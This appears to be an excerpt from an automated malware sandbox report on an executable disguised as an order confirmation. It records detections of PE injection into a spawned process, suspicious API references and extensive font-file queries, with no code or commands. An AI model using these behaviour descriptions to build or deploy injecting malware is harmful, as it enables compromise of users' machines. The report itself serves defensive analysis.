                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, ?k??u0026/u05c1????.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, ufffd?ufffdu002d?/??O?ufffd.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, ?k??u0026/u05c1????.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, ufffd?ufffdu002d?/??O?ufffd.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, ?k??u0026/u05c1????.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, ufffd?ufffdu002d?/??O?ufffd.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, ?k??u0026/u05c1????.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, ufffd?ufffdu002d?/??O?ufffd.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, ?k??u0026/u05c1????.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, ufffd?ufffdu002d?/??O?ufffd.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, ?k??u0026/u05c1????.csReference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeMemory written: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess created: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
